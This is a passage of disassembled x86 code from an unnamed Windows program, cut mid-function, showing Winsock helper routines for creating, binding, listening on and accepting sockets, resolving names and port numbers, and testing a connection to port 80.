push offset dword_41E268
call sub_409C9D
pop ecx
pop ecx
push 1
push offset dword_41E264
call sub_409C9D
pop ecx
pop ecx
loc_404327: ; CODE XREF: sub_4042FB+A�j
mov eax, dword_41E268
pop ebp
retn
sub_4042FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40432E proc near ; CODE XREF: sub_40435B+6�p
; sub_4046BC+5D�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 0
push 1
push 17h
call dword_417218 ; socket
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jz short loc_404350
push [ebp+var_4]
call sub_4053B1
pop ecx
loc_404350: ; CODE XREF: sub_40432E+17�j
xor eax, eax
cmp [ebp+var_4], 0FFFFFFFFh
setnz al
leave
retn
sub_40432E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40435B proc near ; CODE XREF: sub_4083AD:loc_4085D6�p
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
call sub_40432E
test eax, eax
jnz short loc_40436E
xor eax, eax
jmp short locret_4043E7
; ---------------------------------------------------------------------------
loc_40436E: ; CODE XREF: sub_40435B+D�j
lea eax, [ebp+var_14]
push eax
call sub_404193
pop ecx
push 1
lea eax, [ebp+var_14]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_404392
xor eax, eax
jmp short locret_4043E7
; ---------------------------------------------------------------------------
loc_404392: ; CODE XREF: sub_40435B+31�j
push 0BB8h
push 2
lea eax, [ebp+var_14]
push eax
push offset dword_418A5C
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_C]
call sub_404CBB
pop ecx
cmp [ebp+var_8], 0
jz short loc_4043CB
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4043CB
mov [ebp+var_18], 1
jmp short loc_4043CF
; ---------------------------------------------------------------------------
loc_4043CB: ; CODE XREF: sub_40435B+5F�j
; sub_40435B+65�j
and [ebp+var_18], 0
loc_4043CF: ; CODE XREF: sub_40435B+6E�j
mov eax, [ebp+var_18]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4043E4
push [ebp+var_8]
call sub_4053B1
pop ecx
loc_4043E4: ; CODE XREF: sub_40435B+7E�j
mov eax, [ebp+var_4]
locret_4043E7: ; CODE XREF: sub_40435B+11�j
; sub_40435B+35�j
leave
retn
sub_40435B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043E9 proc near ; CODE XREF: sub_408B30:loc_408C9F�p
; sub_40CA29+231�p ...
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
push offset dword_418A1C
lea eax, [ebp+var_1C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_1C]
push eax
call sub_4105FB
pop ecx
push 7D0h
push 2
push offset a80 ; "80"
lea eax, [ebp+var_1C]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_404439
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_404439
mov [ebp+var_20], 1
jmp short loc_40443D
; ---------------------------------------------------------------------------
loc_404439: ; CODE XREF: sub_4043E9+3F�j
; sub_4043E9+45�j
and [ebp+var_20], 0
loc_40443D: ; CODE XREF: sub_4043E9+4E�j
mov eax, [ebp+var_20]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_404452
push [ebp+var_8]
call sub_4053B1
pop ecx
loc_404452: ; CODE XREF: sub_4043E9+5E�j
mov eax, [ebp+var_4]
leave
retn
sub_4043E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404457 proc near ; CODE XREF: sub_404FE7+AF�p
; sub_4050EA+ED�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
xor eax, eax
cmp [ebp+arg_4], 0
setz al
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push [ebp+arg_0]
call dword_417214 ; ioctlsocket
leave
retn
sub_404457 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40447B proc near ; CODE XREF: sub_40732D+22E�p
; sub_40732D+296�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push 4004667Fh
push [ebp+arg_0]
call dword_417214 ; ioctlsocket
xor eax, eax
cmp [ebp+var_4], 0
setnz al
leave
retn
sub_40447B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40449C proc near ; CODE XREF: sub_40D871+5A1�p
; sub_411DC5+65�p
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
mov [ebp+var_84], 80h
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call dword_417240 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_4044CC
xor eax, eax
jmp short locret_4044F5
; ---------------------------------------------------------------------------
loc_4044CC: ; CODE XREF: sub_40449C+2A�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
push [ebp+var_84]
lea eax, [ebp+var_80]
push eax
call dword_41DE58 ; getnameinfo
test eax, eax
jz short loc_4044F2
xor eax, eax
jmp short locret_4044F5
; ---------------------------------------------------------------------------
loc_4044F2: ; CODE XREF: sub_40449C+50�j
push 1
pop eax
locret_4044F5: ; CODE XREF: sub_40449C+2E�j
; sub_40449C+54�j
leave
retn
sub_40449C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044F7 proc near ; CODE XREF: sub_40732D+DD�p
; sub_4129CA+29�p ...
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
mov [ebp+var_84], 80h
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call dword_417210 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_404527
xor eax, eax
jmp short locret_404550
; ---------------------------------------------------------------------------
loc_404527: ; CODE XREF: sub_4044F7+2A�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
push [ebp+var_84]
lea eax, [ebp+var_80]
push eax
call dword_41DE58 ; getnameinfo
test eax, eax
jz short loc_40454D
xor eax, eax
jmp short locret_404550
; ---------------------------------------------------------------------------
loc_40454D: ; CODE XREF: sub_4044F7+50�j
push 1
pop eax
locret_404550: ; CODE XREF: sub_4044F7+2E�j
; sub_4044F7+54�j
leave
retn
sub_4044F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404552 proc near ; CODE XREF: sub_41331E+A6�p
; sub_415F69+256�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
mov [ebp+var_88], 80h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call dword_417240 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_404582
xor eax, eax
jmp short locret_4045B0
; ---------------------------------------------------------------------------
loc_404582: ; CODE XREF: sub_404552+2A�j
lea eax, [ebp+var_80]
mov [ebp+var_84], eax
push 0Ah
push [ebp+arg_4]
mov eax, [ebp+var_84]
mov ax, [eax+2]
push eax
call dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
pop eax
locret_4045B0: ; CODE XREF: sub_404552+2E�j
leave
retn
sub_404552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045B2 proc near ; CODE XREF: sub_4143B0+191�p
; sub_415F69+20A�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
mov [ebp+var_88], 80h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call dword_417210 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_4045E2
xor eax, eax
jmp short locret_404610
; ---------------------------------------------------------------------------
loc_4045E2: ; CODE XREF: sub_4045B2+2A�j
lea eax, [ebp+var_80]
mov [ebp+var_84], eax
push 0Ah
push [ebp+arg_4]
mov eax, [ebp+var_84]
mov ax, [eax+2]
push eax
call dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
pop eax
locret_404610: ; CODE XREF: sub_4045B2+2E�j
leave
retn
sub_4045B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404612 proc near ; CODE XREF: sub_40D871+69C�p
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40Ch
lea eax, [ebp+var_408]
push eax
push 0
push 0
push [ebp+arg_0]
call dword_41DE54 ; getaddrinfo
test eax, eax
jnz loc_4046B8
mov eax, [ebp+var_408]
mov [ebp+var_40C], eax
loc_404643: ; CODE XREF: sub_404612+98�j
cmp [ebp+var_40C], 0
jz short loc_4046AC
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_404]
push eax
mov eax, [ebp+var_40C]
push dword ptr [eax+10h]
mov eax, [ebp+var_40C]
push dword ptr [eax+18h]
call dword_41DE58 ; getnameinfo
test eax, eax
jnz short loc_40469B
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 2
jnz short loc_40469B
lea eax, [ebp+var_404]
push eax
push [ebp+arg_4]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov al, 1
jmp short locret_4046BA
; ---------------------------------------------------------------------------
loc_40469B: ; CODE XREF: sub_404612+66�j
; sub_404612+72�j
mov eax, [ebp+var_40C]
mov eax, [eax+1Ch]
mov [ebp+var_40C], eax
jmp short loc_404643
; ---------------------------------------------------------------------------
loc_4046AC: ; CODE XREF: sub_404612+38�j
push [ebp+var_408]
call dword_41DE5C ; freeaddrinfo
loc_4046B8: ; CODE XREF: sub_404612+1F�j
xor al, al
locret_4046BA: ; CODE XREF: sub_404612+87�j
leave
retn
sub_404612 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046BC proc near ; CODE XREF: sub_4020C2+124�p
; sub_403DF3+36�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3Ch
xor eax, eax
test eax, eax
jz short loc_4046D1
mov [ebp+var_3C], 2
jmp short loc_4046D8
; ---------------------------------------------------------------------------
loc_4046D1: ; CODE XREF: sub_4046BC+A�j
mov [ebp+var_3C], 1
loc_4046D8: ; CODE XREF: sub_4046BC+13�j
mov eax, [ebp+var_3C]
mov [ebp+var_8], eax
push 1008h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jnz short loc_4046F9
xor eax, eax
jmp locret_40486F
; ---------------------------------------------------------------------------
loc_4046F9: ; CODE XREF: sub_4046BC+34�j
mov eax, [ebp+var_2C]
and dword ptr [eax], 0
mov eax, [ebp+var_2C]
and dword ptr [eax+804h], 0
push 20h
push 0
lea eax, [ebp+var_28]
push eax
call sub_416B6A ; memset
add esp, 0Ch
call sub_40432E
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
mov [ebp+var_24], eax
mov eax, [ebp+var_8]
mov [ebp+var_20], eax
mov [ebp+var_28], 5
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
push 0
call dword_41DE54 ; getaddrinfo
test eax, eax
jz short loc_40475D
push [ebp+var_2C]
call sub_416B4C ; free
pop ecx
xor eax, eax
jmp locret_40486F
; ---------------------------------------------------------------------------
loc_40475D: ; CODE XREF: sub_4046BC+8F�j
mov eax, [ebp+var_30]
mov [ebp+var_4], eax
jmp short loc_40476E
; ---------------------------------------------------------------------------
loc_404765: ; CODE XREF: sub_4046BC+DD�j
; sub_4046BC+F1�j ...
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_40476E: ; CODE XREF: sub_4046BC+A7�j
cmp [ebp+var_4], 0
jz loc_40484E
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call dword_417218 ; socket
mov [ebp+var_34], eax
cmp [ebp+var_34], 0FFFFFFFFh
jnz short loc_40479B
jmp short loc_404765
; ---------------------------------------------------------------------------
loc_40479B: ; CODE XREF: sub_4046BC+DB�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 2
jz short loc_4047AF
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 17h
jz short loc_4047AF
jmp short loc_404765
; ---------------------------------------------------------------------------
loc_4047AF: ; CODE XREF: sub_4046BC+E6�j
; sub_4046BC+EF�j
mov eax, [ebp+arg_4]
and eax, 2
test eax, eax
jz short loc_4047D6
mov [ebp+var_38], 1
push 4
lea eax, [ebp+var_38]
push eax
push 4
push 0FFFFh
push [ebp+var_34]
call dword_417204 ; setsockopt
loc_4047D6: ; CODE XREF: sub_4046BC+FB�j
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_34]
call dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4047FE
push [ebp+var_34]
call sub_4053B1
pop ecx
jmp loc_404765
; ---------------------------------------------------------------------------
loc_4047FE: ; CODE XREF: sub_4046BC+132�j
cmp [ebp+var_8], 1
jnz short loc_404822
push 32h
push [ebp+var_34]
call dword_417268 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_404822
push [ebp+var_34]
call sub_4053B1
pop ecx
jmp loc_404765
; ---------------------------------------------------------------------------
loc_404822: ; CODE XREF: sub_4046BC+146�j
; sub_4046BC+156�j
mov eax, [ebp+var_2C]
mov eax, [eax]
mov ecx, [ebp+var_2C]
mov edx, [ebp+var_34]
mov [ecx+eax*4+4], edx
mov eax, [ebp+var_2C]
mov eax, [eax]
inc eax
mov ecx, [ebp+var_2C]
mov [ecx], eax
mov eax, [ebp+var_2C]
cmp dword ptr [eax], 200h
jnz short loc_404849
jmp short loc_40484E
; ---------------------------------------------------------------------------
loc_404849: ; CODE XREF: sub_4046BC+189�j
jmp loc_404765
; ---------------------------------------------------------------------------
loc_40484E: ; CODE XREF: sub_4046BC+B6�j
; sub_4046BC+18B�j
push [ebp+var_30]
call dword_41DE5C ; freeaddrinfo
mov eax, [ebp+var_2C]
cmp dword ptr [eax], 0
jnz short loc_40486C
push [ebp+var_2C]
call sub_416B4C ; free
pop ecx
xor eax, eax
jmp short locret_40486F
; ---------------------------------------------------------------------------
loc_40486C: ; CODE XREF: sub_4046BC+1A1�j
mov eax, [ebp+var_2C]
locret_40486F: ; CODE XREF: sub_4046BC+38�j
; sub_4046BC+9C�j ...
leave
retn
sub_4046BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404871 proc near ; CODE XREF: sub_411BBC+B0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40488F
xor eax, eax
jmp short locret_4048ED
; ---------------------------------------------------------------------------
loc_40488F: ; CODE XREF: sub_404871+18�j
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+arg_0]
add eax, [ecx]
cmp eax, 200h
jbe short loc_4048AD
push [ebp+var_4]
call sub_404CBB
pop ecx
xor eax, eax
jmp short locret_4048ED
; ---------------------------------------------------------------------------
loc_4048AD: ; CODE XREF: sub_404871+2D�j
mov eax, [ebp+var_4]
mov eax, [eax]
shl eax, 2
push eax
mov eax, [ebp+var_4]
add eax, 4
push eax
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*4+4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+var_4]
add eax, [ecx]
mov ecx, [ebp+arg_0]
mov [ecx], eax
push [ebp+var_4]
call sub_416B4C ; free
pop ecx
push 1
pop eax
locret_4048ED: ; CODE XREF: sub_404871+1C�j
; sub_404871+3A�j
leave
retn
sub_404871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048EF proc near ; CODE XREF: sub_4020C2+22E�p
; sub_403DF3+8D�p ...
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0A8h
push esi
mov [ebp+var_4], 80h
and [ebp+var_8C], 0
jmp short loc_404916
; ---------------------------------------------------------------------------
loc_404909: ; CODE XREF: sub_4048EF+133�j
; sub_4048EF:loc_404A32�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404916: ; CODE XREF: sub_4048EF+18�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404A37
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz loc_404A32
loc_40494A: ; CODE XREF: sub_4048EF+100�j
and [ebp+var_9C], 0
jmp short loc_404960
; ---------------------------------------------------------------------------
loc_404953: ; CODE XREF: sub_4048EF:loc_4049E6�j
mov eax, [ebp+var_9C]
inc eax
mov [ebp+var_9C], eax
loc_404960: ; CODE XREF: sub_4048EF+62�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_9C]
cmp ecx, [eax+804h]
jnb short loc_4049EB
mov eax, [ebp+var_9C]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_4049E6
loc_404990: ; CODE XREF: sub_4048EF+E0�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
cmp [ebp+var_9C], eax
jnb short loc_4049D1
mov eax, [ebp+var_9C]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_9C]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+80Ch]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+var_9C]
inc eax
mov [ebp+var_9C], eax
jmp short loc_404990
; ---------------------------------------------------------------------------
loc_4049D1: ; CODE XREF: sub_4048EF+B1�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
jmp short loc_4049EB
; ---------------------------------------------------------------------------
loc_4049E6: ; CODE XREF: sub_4048EF+9F�j
jmp loc_404953
; ---------------------------------------------------------------------------
loc_4049EB: ; CODE XREF: sub_4048EF+80�j
; sub_4048EF+F5�j
xor eax, eax
test eax, eax
jnz loc_40494A
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_84]
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call dword_4171FC ; accept
mov [ebp+var_98], eax
cmp [ebp+var_98], 0FFFFFFFFh
jnz short loc_404A27
jmp loc_404909
; ---------------------------------------------------------------------------
loc_404A27: ; CODE XREF: sub_4048EF+131�j
mov eax, [ebp+var_98]
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404A32: ; CODE XREF: sub_4048EF+55�j
jmp loc_404909
; ---------------------------------------------------------------------------
loc_404A37: ; CODE XREF: sub_4048EF+32�j
mov eax, [ebp+arg_0]
and dword ptr [eax+804h], 0
and [ebp+var_8C], 0
jmp short loc_404A57
; ---------------------------------------------------------------------------
loc_404A4A: ; CODE XREF: sub_4048EF+21D�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404A57: ; CODE XREF: sub_4048EF+159�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404B11
loc_404A68: ; CODE XREF: sub_4048EF+217�j
and [ebp+var_A0], 0
jmp short loc_404A7E
; ---------------------------------------------------------------------------
loc_404A71: ; CODE XREF: sub_4048EF:loc_404AB0�j
mov eax, [ebp+var_A0]
inc eax
mov [ebp+var_A0], eax
loc_404A7E: ; CODE XREF: sub_4048EF+180�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A0]
cmp ecx, [eax+804h]
jnb short loc_404AB2
mov eax, [ebp+var_A0]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_404AB0
jmp short loc_404AB2
; ---------------------------------------------------------------------------
loc_404AB0: ; CODE XREF: sub_4048EF+1BD�j
jmp short loc_404A71
; ---------------------------------------------------------------------------
loc_404AB2: ; CODE XREF: sub_4048EF+19E�j
; sub_4048EF+1BF�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A0]
cmp ecx, [eax+804h]
jnz short loc_404B02
mov eax, [ebp+arg_0]
cmp dword ptr [eax+804h], 200h
jnb short loc_404B02
mov eax, [ebp+var_A0]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+4]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
loc_404B02: ; CODE XREF: sub_4048EF+1D2�j
; sub_4048EF+1E1�j
xor eax, eax
test eax, eax
jnz loc_404A68
jmp loc_404A4A
; ---------------------------------------------------------------------------
loc_404B11: ; CODE XREF: sub_4048EF+173�j
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_94], eax
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
imul edx, 3E8h
mov [ebp+var_90], edx
lea eax, [ebp+var_94]
push eax
push 0
push 0
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call dword_41722C ; select
mov [ebp+var_88], eax
cmp [ebp+var_88], 0
jnz short loc_404B71
or eax, 0FFFFFFFFh
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404B71: ; CODE XREF: sub_4048EF+278�j
cmp [ebp+var_88], 0FFFFFFFFh
jnz short loc_404B81
xor eax, eax
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404B81: ; CODE XREF: sub_4048EF+289�j
and [ebp+var_8C], 0
jmp short loc_404B97
; ---------------------------------------------------------------------------
loc_404B8A: ; CODE XREF: sub_4048EF+3B4�j
; sub_4048EF:loc_404CB0�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404B97: ; CODE XREF: sub_4048EF+299�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404CB5
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz loc_404CB0
loc_404BCB: ; CODE XREF: sub_4048EF+381�j
and [ebp+var_A8], 0
jmp short loc_404BE1
; ---------------------------------------------------------------------------
loc_404BD4: ; CODE XREF: sub_4048EF:loc_404C67�j
mov eax, [ebp+var_A8]
inc eax
mov [ebp+var_A8], eax
loc_404BE1: ; CODE XREF: sub_4048EF+2E3�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A8]
cmp ecx, [eax+804h]
jnb short loc_404C6C
mov eax, [ebp+var_A8]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_404C67
loc_404C11: ; CODE XREF: sub_4048EF+361�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
cmp [ebp+var_A8], eax
jnb short loc_404C52
mov eax, [ebp+var_A8]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_A8]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+80Ch]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+var_A8]
inc eax
mov [ebp+var_A8], eax
jmp short loc_404C11
; ---------------------------------------------------------------------------
loc_404C52: ; CODE XREF: sub_4048EF+332�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
jmp short loc_404C6C
; ---------------------------------------------------------------------------
loc_404C67: ; CODE XREF: sub_4048EF+320�j
jmp loc_404BD4
; ---------------------------------------------------------------------------
loc_404C6C: ; CODE XREF: sub_4048EF+301�j
; sub_4048EF+376�j
xor eax, eax
test eax, eax
jnz loc_404BCB
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_84]
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call dword_4171FC ; accept
mov [ebp+var_A4], eax
cmp [ebp+var_A4], 0FFFFFFFFh
jnz short loc_404CA8
jmp loc_404B8A
; ---------------------------------------------------------------------------
loc_404CA8: ; CODE XREF: sub_4048EF+3B2�j
mov eax, [ebp+var_A4]
jmp short loc_404CB8
; ---------------------------------------------------------------------------
loc_404CB0: ; CODE XREF: sub_4048EF+2D6�j
jmp loc_404B8A
; ---------------------------------------------------------------------------
loc_404CB5: ; CODE XREF: sub_4048EF+2B3�j
or eax, 0FFFFFFFFh
loc_404CB8: ; CODE XREF: sub_4048EF+13E�j
; sub_4048EF+27D�j ...
pop esi
leave
retn
sub_4048EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CBB proc near ; CODE XREF: sub_4020C2+175�p
; sub_4020C2+25F�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404CCC
; ---------------------------------------------------------------------------
loc_404CC5: ; CODE XREF: sub_404CBB+3E�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404CCC: ; CODE XREF: sub_404CBB+8�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax]
jnb short loc_404CFB
cmp dword_41DE08, 0
jz short loc_404CE9
mov eax, [ebp+arg_0]
cmp dword ptr [eax], 64h
jbe short loc_404CE9
jmp short loc_404CFB
; ---------------------------------------------------------------------------
loc_404CE9: ; CODE XREF: sub_404CBB+22�j
; sub_404CBB+2A�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_4053B1
pop ecx
jmp short loc_404CC5
; ---------------------------------------------------------------------------
loc_404CFB: ; CODE XREF: sub_404CBB+19�j
; sub_404CBB+2C�j
mov eax, [ebp+arg_0]
and dword ptr [eax+804h], 0
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
leave
retn
sub_404CBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D10 proc near ; CODE XREF: sub_41349C+1B7�p
; sub_4143B0+3A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 200h
jbe short loc_404D21
xor eax, eax
jmp short locret_404D4B
; ---------------------------------------------------------------------------
loc_404D21: ; CODE XREF: sub_404D10+B�j
push 1010h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_404D39
xor eax, eax
jmp short locret_404D4B
; ---------------------------------------------------------------------------
loc_404D39: ; CODE XREF: sub_404D10+23�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_4]
and dword ptr [eax+4], 0
mov eax, [ebp+var_4]
locret_404D4B: ; CODE XREF: sub_404D10+F�j
; sub_404D10+27�j
leave
retn
sub_404D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D4D proc near ; CODE XREF: sub_41349C+417�p
; sub_4143B0+109�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
